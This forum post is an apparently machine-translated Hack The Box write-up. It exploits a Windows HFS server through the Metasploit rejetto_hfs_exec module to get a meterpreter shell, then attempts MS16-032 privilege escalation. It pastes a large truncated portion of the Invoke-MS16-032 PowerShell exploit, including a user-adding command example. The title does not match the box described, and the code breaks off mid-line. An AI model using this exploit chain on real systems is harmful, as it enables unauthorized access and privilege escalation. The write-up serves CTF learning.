Jump to content

Featured Replies

Posted

Hack The Box —— Lame

20190813163044.png-water_print

信息搜集

nmap

1

nmap -T4 -A -v 10.10.10.8

20190813163152.png-water_print

I found that the server only had port 80, corresponding to the hfs service, browser access, and found the version number of the hfs service.

exploit-db

Search for related vulnerabilities and found that there is a corresponding exp on msf

20190813163541.png-water_print

漏洞利用

Use use exploit/windows/http/rejetto_hfs_exec under 010-1010 msf and configure meterpreter payload.

exploit runs, rebound successfully meterpreter shell

20190813163807.png-water_print

sysinfo shows that the system is 64-bit, but the meterpreter payload we use by default is 32-bit, so transfer meterpreter to a 64-bit process, such as explorer.exe

20190813163942.png-water_print

Check the current directory directly, find user.txt, type to view the content, and submit it.

At this time, it is found that it is non-administrator permissions, and the meterpreter uses getsystem to try to increase the authority, but it is found that it fails.

20190814093324.png-water_print

Try to use msf locally to escalate rights.

20190814093852.png-water_print

Looking for available exps, find that using ms16-032 can be targeted at Windows Server 2012.

20190814093852.png-water_print

However, when trying, I found that it was unsuccessful and the rebound shell was not the system permission.

So search for the exploit script for the vulnerability.

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

twenty one

twenty two

twenty three

twenty four

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

63

64

65

66

67

68

69

70

71

72

73

74

75

76

77

78

79

80

81

82

83

84

85

86

87

88

89

90

91

92

93

94

95

96

97

98

99

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

249

250

251

252

253

254

255

256

257

258

259

260

261

262

263

264

265

266

267

268

269

270

271

272

273

274

275

276

277

278

279

280

281

282

283

284

285

286

287

288

289

290

291

292

293

294

295

296

297

298

299

300

301

302

303

304

305

306

307

308

309

310

311

312

313

314

315

316

317

318

319

320

321

322

323

324

325

326

327

328

329

330

331

332

333

334

335

336

337

338

339

340

341

342

343

344

345

346

347

348

349

350

351

352

353

354

355

356

357

358

359

360

361

362

363

364

365

366

367

368

369

370

371

372

373

374

375

376

377

378

379

380

381

382

383

384

385

386

387

388

389

390

391

392

393

394

395

396

397

398

399

400

401

402

403

404

405

406

function Invoke-MS16-032 {

#

.SYNOPSIS

PowerShell implementation of MS16-032. The exploit targets all vulnerable

operating systems that support PowerShell v2+. Credit for the discovery of

the bug and the logic to exploit it go to James Forshaw (@tiraniddo).

Targets:

* Win7-Win10 2k8-2k12==32/64 bit!

* Tested on x32 Win7, x64 Win8, x64 2k12R2

Notes:

* In order for the race condition to succeed the machine must have 2+ CPU

cores. If testing in a VM just make sure to add a core if needed mkay.

* The exploit is pretty reliable, however ~1/6 times it will say it succeeded

but not spawn a shell. Not sure what the issue is but just re-run and profit!

* Want to know more about MS16-032==

https://googleprojectzero.blogspot.co.uk/2016/03/exploiting-leaked-thread-handle.html

.DESCRIPTION

Author: Ruben Boonen (@FuzzySec)

Blog: http://www.fuzzysecurity.com/

License: BSD 3-Clause

Required Dependencies: PowerShell v2+

Optional Dependencies: None

.PARAMETER Application

Specifies an Application to run.

.PARAMETER Commandline

Specifies Commandline, such as net user xxx xxx /add

.EXAMPLE

C:\PS Invoke-MS16-032 -Application C:\Windows\System32\cmd.exe

C:\PS Invoke-MS16-032 -Application C:\Windows\System32\cmd.exe -Commandline '/c net user 1 1 /add'

#

[CmdletBinding()]

param(

[Parameter(Mandatory=$False, ParameterSetName='C:\Windows\System32\cmd.exe' )]

[string]

$Application,

[Parameter(Mandatory=$False)]

[string]

$Commandline

)

Add-Type -TypeDefinition @'

using System;

using System.Diagnostics;

using System.Runtime.InteropServices;

using System.Security.Principal;

[StructLayout(LayoutKind.Sequential)]

public struct PROCESS_INFORMATION

{

public IntPtr hProcess;

public IntPtr hThread;

public int dwProcessId;

public int dwThreadId;

}

[StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)]

public struct STARTUPINFO

{

public Int32 cb;

public string lpReserved;

public string lpDesktop;

public string lpTitle;

public Int32 dwX;

public Int32 dwY;

public Int32 dwXSize;

public Int32 dwYSize;

public Int32 dwXCountChars;

public Int32 dwYCountChars;

public Int32 dwFillAttribute;

public Int32 dwFlags;

public Int16 wShowWindow;

public Int16 cbReserved2;

public IntPtr lpReserved2;

public IntPtr hStdInput;

public IntPtr hStdOutput;

public IntPtr hStdError;

}

[StructLayout(LayoutKind.Sequential)]

public struct SQOS

{

public int Length;

public int ImpersonationLevel;

public int ContextTrackingMode;

public bool EffectiveOnly;

}

public static class Advapi32

{

[DllImport('advapi32.dll', SetLastError=true, CharSet=CharSet.Unicode)]

public static extern bool CreateProcessWithLogonW(

String userName,

String domain,

String password,

int logonFlags,

String applicationName,

String commandLine,

int creationFlags,

int environment,

String currentDirectory,

ref STARTUPINFO startupInfo,

out PROCESS_INFORMATION processInformation);

[DllImport('advapi32.dll', SetLastError=true)]

public static extern bool SetThreadToken(

ref IntPtr Thread,

IntPtr Token);

[DllImport('advapi32.dll', SetLastError=true)]

public static extern bool OpenThreadToken(

IntPtr ThreadHandle,

int DesiredAccess,

bool OpenAsSelf,

out IntPtr TokenHandle);

[DllImport('advapi32.dll', SetLastError=true)]

public static extern bool OpenProcessToken(

IntPtr ProcessHandle,

int DesiredAccess,

ref IntPtr TokenHandle);

[DllImport('advapi32.dll', SetLastError=true)]

public extern static bool DuplicateToken(

IntPtr ExistingTokenHandle,

int SECURITY_IMPERSONATION_LEVEL,

ref IntPtr DuplicateTokenHandle);

}

public static class Kernel32

{

[DllImport('kernel32.dll')]

public static extern uint GetLastError();

[DllImport('kernel32.dll', SetLastError=true)]

public static extern IntPtr GetCurrentProcess();

[DllImport('kernel32.dll', SetLastError=true)]

public static extern IntPtr GetCurrentThread();

[DllImport('kernel32.dll', SetLastError=true)]

public static extern int GetThreadId(IntPtr hThread);

[DllImport('kernel32.dll', SetLastError=true)]

public static extern int GetProcessIdOfThread(IntPtr handle);

[DllImport('kernel32.dll',SetLastError=true)]

public static extern int SuspendThread(IntPtr hThread);

[DllImport('kernel32.dll',SetLastError=true)]

public static extern int ResumeThread(IntPtr hThread);

[DllImport('kernel32.dll', SetLastError=true)]

public static extern bool TerminateProcess(

IntPtr hProcess,

uint uExitCode);

[DllImport('kernel32.dll', SetLastError=true)]

public static extern bool CloseHandle(IntPtr hObject);

[DllImport('kernel32.dll', SetLastError=true)]

public static extern bool DuplicateHandle(

IntPtr hSourceProcessHandle,

IntPtr hSourceHandle,

IntPtr hTargetProcessHandle,

ref IntPtr lpTargetHandle,

int dwDesiredAccess,

bool bInheritHandle,

int dwOptions);

}

public static class Ntdll

{

[DllImport('ntdll.dll', SetLastError=true)]

public static extern int NtImpersonateThread(

IntPtr ThreadHandle,

IntPtr ThreadToImpersonate,

ref SQOS SecurityQualityOfService);

}

'@

function Get-ThreadHandle {

# StartupInfo Struct

$StartupInfo=New-Object STARTUPINFO

$StartupInfo.dwFlags=0x00000101 # STARTF_USESTDHANDLES

$StartupInfo.wShowWindow=0;

$StartupInfo.hStdInput=[Kernel32]:GetCurrentThread()

$StartupInfo.hStdOutput=[Kernel32]:GetCurrentThread()

$StartupInfo.hStdError=[Kernel32]:

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

Important Information

HackTeam Cookie PolicyWe have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.